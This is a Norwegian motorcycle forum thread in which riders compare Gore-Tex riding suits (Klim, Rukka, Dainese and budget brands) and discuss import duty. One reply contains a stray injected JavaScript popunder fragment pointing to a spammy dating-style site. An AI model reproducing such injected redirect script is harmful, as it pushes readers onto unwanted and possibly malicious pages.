Hvilken Gore-Tex-bekledning er best?

... om deler, tilbehør, utstyr, renhold, MC-forsikring, kjøreklær osv. til MC, fører og passasjer.
Jacco
Innlegg: 3
Registrert: 13 jul 2020, 21:44
Motorsykkelen din: Yamaha MT-07 2020

Hvilken Gore-Tex-bekledning er best?

Legg inn av Jacco »

Hei! Jeg skal kjøpe et ordentlig sett med MC-klær og vil ha noe med Gore-Tex. Har lagt merke til Dainese Carve Master 2, men jeg lurer på om det finnes andre jakker som er bedre, uten at det trenger å koste noe særlig mer. Er det noen som nylig har bestilt varer fra utlandet, hvordan er det med toll på dette?

På forhånd, takk for svar! :D

Brukeravatar
pingvin
Innlegg: 1597
Registrert: 20 okt 2013, 19:25
Motorsykkelen din: Triumph Scrambler 1200 XE

Re: Hvilken Gore-Tex-bekledning er best?

Legg inn av pingvin »

Så jo ikke så dum ut den Dainese dressen, veldig greit med ventilasjonsglidelåser kan åpne når varmt. Hatt mye Dainese og vært godt fornøyd, ikke billigst men får vel til en viss grad det en betaler for...og Rossi skal jo ha sin del ;)

Toll er vel mva på 25% også på frakt pluss par hundringser i behandling.

EDIT: Ser at Carve Masteren har Z-liner membran som ikke laminert til ytterstoffet men er fast. Vil da ikke ventilerer like bra som laminert membran (siden luften ikke kommer gjennom membranen) og heller ikke like bra når regner (stoffet utenpå blir tyngre). Men billigere enn laminert og kanskje bra nok.

Har Klim Kodiak, dyr men bra, laminert membran, masse ventilasjon og veldig sikker. Får minst 10% på Motorspeed i Lillehammer bare du spør, best er å dra dit å prøve, de har normalt vedlig bra utvalg (som nok har sammenheng med at de deler bygg med Klim importøren).

Har du sett denne?:

');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}
2019 Triumph Scrambler 1200
2008 KTM 690 Enduro
2017 KTM 450 EXC-F Six days

Brukeravatar
FredrikE24
Innlegg: 4715
Registrert: 24 apr 2016, 18:53
Motorsykkelen din: BMW K1200RS
Sted: Nordre Follo

Re: Hvilken Gore-Tex-bekledning er best?

Legg inn av FredrikE24 »

Klim og Rukka er det beste der ute. Hvertfall som er sånn nogenlunde enkelt å få kjøpt hos den gjengse forhandler.

Det koster en del penger, men du verden og mye glede og lite bekymringer det er.
Jeg har selv ikke hatt noe annet, og kommer nok aldri til å ha det heller. Nå har jeg kjørt med én Halvarsson-dress én gang og det holdt for meg det.

Man finner sikkert en mellomting, men skal man ha noe man kan kjøre i alle forhold med uten å bli verken varm, våt eller svett/klam så koster det.

Brukeravatar
Olav K
Innlegg: 2636
Registrert: 18 mai 2013, 14:07
Motorsykkelen din: Den Beste Sykkel (BMW R1250GSA 2019)
Sted: Odda/Rosendal

Re: Hvilken Gore-Tex-bekledning er best?

Legg inn av Olav K »

Jeg deler MC bekledning inn i tre typer.

Klim, Rukka, og røkla (de andre)
Klim har desidert best luftemuligheter, og Rukka har en "varmere" løsning på krave i halsen og mansjetter nede på armene. Men det går på bekostning av lufting.

Hva man velger... opp til hver enkelt.
Jeg kjører mest med Rukka'en her til lands.
http://www.kant1.no" onclick="window.open(this.href);return false;

Brukeravatar
Bjerknez
Innlegg: 22864
Registrert: 06 aug 2013, 00:59
Motorsykkelen din: Triumph Rocket III GT
Sted: Fredrikstad
Kontakt:

Re: Hvilken Gore-Tex-bekledning er best?

Legg inn av Bjerknez »

Olav K skrev: 14 jul 2020, 10:02 Jeg deler MC bekledning inn i tre typer.

Klim, Rukka, og røkla (de andre)
Klim har desidert best luftemuligheter, og Rukka har en "varmere" løsning på krave i halsen og mansjetter nede på armene. Men det går på bekostning av lufting.

Hva man velger... opp til hver enkelt.
Jeg kjører mest med Rukka'en her til lands.
Er det fordi du har prøvd alle andre merker og har bygget erfaringer over tid, eller er det fordi du er veldig fornøyd med Rukka og har bestemt deg for at det er det du vil satse på?

Rha
Innlegg: 287
Registrert: 04 jul 2017, 22:26
Motorsykkelen din: yamaha mt09 tracer 2017

Re: Hvilken Gore-Tex-bekledning er best?

Legg inn av Rha »

Har prøvd flere merker og jeg kan støtte det Olav K skrev. Goretex=tørr, dryway til jofoma= tja sånn sirka.
Har da prøvd bullfighter og den holder en skur, jofoma og harlvorsens holder noe lengre. Richa regndress holder deg tørr fra det på utsiden, men blir helt steamet fra innsiden. Rukka og Klim=tørr.

Klart alt fungerer ikke med feil behandling, men med riktig kan det dårlige bli noe bedre.
Nå har jeg surmult og vært sur som fa** i to år og plutselig ble jeg positiv.....

Brukeravatar
Bjerknez
Innlegg: 22864
Registrert: 06 aug 2013, 00:59
Motorsykkelen din: Triumph Rocket III GT
Sted: Fredrikstad
Kontakt:

Re: Hvilken Gore-Tex-bekledning er best?

Legg inn av Bjerknez »

Rha skrev: 14 jul 2020, 17:24 Har prøvd flere merker og jeg kan støtte det Olav K skrev. Goretex=tørr, dryway til jofoma= tja sånn sirka.
Har da prøvd bullfighter og den holder en skur, jofoma og harlvorsens holder noe lengre. Richa regndress holder deg tørr fra det på utsiden, men blir helt steamet fra innsiden. Rukka og Klim=tørr.

Klart alt fungerer ikke med feil behandling, men med riktig kan det dårlige bli noe bedre.
Joda, min erfaring så langt er også at Klim er bra saker. Har selv hatt Klim. Men jeg har også erfart at enkelte billigmerker er veldig gode til prisen. Den dressen jeg har nå holder all vann ute. Dette fikk jeg erfart i fjor sommer etter tre timer i øsende regnvær. Bakdelen er at den ikke har veldig gode luftemuligheter. Men fordelen er at den er varmere enn klim dressen.

Har jo ikke akkurat slitt den ut, men etter tre år er den fortsatt like hel.

I fohold til prisen jeg ga for bukse og jakke (2.590,-) så er jeg imponert. Ser man helt bort fra prisen, så vinner nok Klim ja. Men nå kjører jo ikke jeg verden rundt lenger heller, så andre har sikkert et større behov :)

Jacco
Innlegg: 3
Registrert: 13 jul 2020, 21:44
Motorsykkelen din: Yamaha MT-07 2020

Re: Hvilken Gore-Tex-bekledning er best?

Legg inn av Jacco »

Takk for gode svar! Ser at Rukka og Klim kommer best ut av de fleste diskusjoner, men valget falt likevel på Dainese denne gangen. Jeg likte måten den er bygd opp på og den ser veldig bra ut samtidig. Spent på hvordan den fungerer i praksis. Ikke utenkelig at jeg kommer til å prøve Rukka eller Klim senere.

Brukeravatar
ejs
Innlegg: 1635
Registrert: 25 jun 2004, 23:52
Motorsykkelen din: Moto Guzzi California EV 1999 modell
Sted: 4645 Nodeland

Re: Hvilken Gore-Tex-bekledning er best?

Legg inn av ejs »

Har alltid hatt billigmerker. Har kjørt 40 mil i regnvær iført Bullfighter dress . Kom frem tørr....
De andre dressene har også holdt meg tørr.
Jofama, Artech, Roleff, Cruiser (merket til de som startet MCsiden) + en engelsk dress som jeg ikke husker navnet på. for meg virker dressene i ca 4 sesonger før de begynner å lekke inn vann i albue og i skrittet.
Min statestikk siden 1999. Er på min hjelm nr 5&6 også siden 1999. Begynte å kjøre MC igjen i 40års krisa.🥇🥇
If it ain't broke, I'll break it.

Brukeravatar
AJ
Administrator
Innlegg: 37838
Registrert: 30 sep 2006, 18:46
Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
Sted: Lunner på Hadeland
Kontakt:

Re: Hvilken Gore-Tex-bekledning er best?

Legg inn av AJ »

ejs skrev: 14 jul 2020, 22:32 Cruiser (merket til de som startet MCsiden) + en engelsk dress som jeg ikke husker navnet på. for meg virker dressene i ca 4 sesonger før de begynner å lekke inn vann i albue og i skrittet.
Artig at du nevner Cruiser.
Jeg har fortsatt en av jakkene jeg kjøpte derfra og oppdaget først mange år senere at jakka faktisk hadde luftelommer, lenge før jeg visste om andre merker som hadde det samme.
Cruiserjakka er veldig solid og holder mål den dag i dag.

Senere har jeg for det meste brukte HELD og har vært veldig fornøyd med det, både når det gjelder kjøring i regn i en begrenset periode og luftelommene i jakke og bukse.
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.

MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering Bilde

Brukeravatar
pingvin
Innlegg: 1597
Registrert: 20 okt 2013, 19:25
Motorsykkelen din: Triumph Scrambler 1200 XE

Re: Hvilken Gore-Tex-bekledning er best?

Legg inn av pingvin »

Jacco skrev: 14 jul 2020, 22:17 Takk for gode svar! Ser at Rukka og Klim kommer best ut av de fleste diskusjoner, men valget falt likevel på Dainese denne gangen. Jeg likte måten den er bygd opp på og den ser veldig bra ut samtidig. Spent på hvordan den fungerer i praksis. Ikke utenkelig at jeg kommer til å prøve Rukka eller Klim senere.
Dainese er veldig bra så du blir helt sikkert fornøyd :thumleft
2019 Triumph Scrambler 1200
2008 KTM 690 Enduro
2017 KTM 450 EXC-F Six days

Brukeravatar
Bjerknez
Innlegg: 22864
Registrert: 06 aug 2013, 00:59
Motorsykkelen din: Triumph Rocket III GT
Sted: Fredrikstad
Kontakt:

Re: Hvilken Gore-Tex-bekledning er best?

Legg inn av Bjerknez »

ejs skrev: 14 jul 2020, 22:32 Har alltid hatt billigmerker. Har kjørt 40 mil i regnvær iført Bullfighter dress . Kom frem tørr....
De andre dressene har også holdt meg tørr.
Jofama, Artech, Roleff, Cruiser (merket til de som startet MCsiden) + en engelsk dress som jeg ikke husker navnet på. for meg virker dressene i ca 4 sesonger før de begynner å lekke inn vann i albue og i skrittet.
Min statestikk siden 1999. Er på min hjelm nr 5&6 også siden 1999. Begynte å kjøre MC igjen i 40års krisa.🥇🥇
Denne kjøpte jeg. Et kupp til prisen spør du meg.
https://sharkspeed.no/furysuit

Brukeravatar
AJ
Administrator
Innlegg: 37838
Registrert: 30 sep 2006, 18:46
Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
Sted: Lunner på Hadeland
Kontakt:

Re: Hvilken Gore-Tex-bekledning er best?

Legg inn av AJ »

Bjerknez skrev: 15 jul 2020, 08:30 Denne kjøpte jeg. Et kupp til prisen spør du meg.
https://sharkspeed.no/furysuit
Denne har ventilasjonsåpninger i jakka iflg. Sharkspeed. Stemmer dette?
Hva med buksa, har den slike åpninger? Ser sånn ut på bildene, men står ingenting om det på Sharkspeedsiden...

Ut fra det du har skrevet om dine erfaringer med denne dressen, kjenner jeg at det faktisk klør litt i kjøpefingeren... :redface .
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.

MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering Bilde

Brukeravatar
Bjerknez
Innlegg: 22864
Registrert: 06 aug 2013, 00:59
Motorsykkelen din: Triumph Rocket III GT
Sted: Fredrikstad
Kontakt:

Re: Hvilken Gore-Tex-bekledning er best?

Legg inn av Bjerknez »

AJ skrev: 15 jul 2020, 09:06
Bjerknez skrev: 15 jul 2020, 08:30 Denne kjøpte jeg. Et kupp til prisen spør du meg.
https://sharkspeed.no/furysuit
Denne har ventilasjonsåpninger i jakka iflg. Sharkspeed. Stemmer dette?
Hva med buksa, har den slike åpninger? Ser sånn ut på bildene, men står ingenting om det på Sharkspeedsiden...

Ut fra det du har skrevet om dine erfaringer med denne dressen, kjenner jeg at det faktisk klør litt i kjøpefingeren... :redface .
Det er to luftelommer på lårene på buksen. På jakken er jeg usikker. Har ikke utforsket den så veldig :redface

Det følger med ekstra innerfor, men denne kan du bare ta ut med en gang for denne er mer enn varm nok uten. Til prisen kan jeg ikke skjønne annet enn at denne må være et kupp. :thumleft

Brukeravatar
Nomade
Innlegg: 653
Registrert: 17 jul 2016, 13:40
Motorsykkelen din: Honda NC750XD
Sted: Oslo

Re: Hvilken Gore-Tex-bekledning er best?

Legg inn av Nomade »

Ser bra ut den Bjerknez, hva med passform, er man feks en normal L type så passer det? Kan man justere høyde på knebeskytter?

Svar